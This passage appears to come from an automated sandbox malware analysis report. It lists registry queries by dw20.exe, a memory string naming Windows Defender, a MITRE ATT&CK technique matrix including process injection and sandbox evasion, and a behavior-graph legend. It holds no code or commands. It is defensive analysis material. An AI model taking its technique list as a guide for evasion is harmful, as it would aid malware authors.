Source: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDateJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: Amcache.hve.16.drBinary or memory string: c:\program files\windows defender\msmpeng.exe

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsWindows Management InstrumentationPath InterceptionProcess Injection11Virtualization/Sandbox Evasion1OS Credential DumpingQuery Registry1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemorySecurity Software Discovery21Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection11Security Account ManagerVirtualization/Sandbox Evasion1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Timestomp1NTDSFile and Directory Discovery1Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsSystem Information Discovery22SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsRemote System Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet